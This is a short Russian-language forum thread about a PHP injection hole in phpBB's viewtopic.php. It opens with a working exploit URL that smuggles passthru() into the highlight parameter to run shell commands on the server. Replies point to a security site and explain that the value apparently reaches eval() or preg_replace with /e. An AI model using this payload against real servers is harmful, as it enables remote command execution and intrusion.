![]() |
PHP-injection (phpbb)
Код:
viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'viewtopic.php |
СекЛаб почитай,там описывается...
|
ok, Спасибо :)
закрывайте тему |
Я не смотрел в код, но похоже, что значение highlight или то что от него осталось после неких операций над ним скрипта, заносится в eval(); или в preg_replace() с модификатором /e
|
Вроде это и написано на секлабе :)
|
| Время: 09:32 |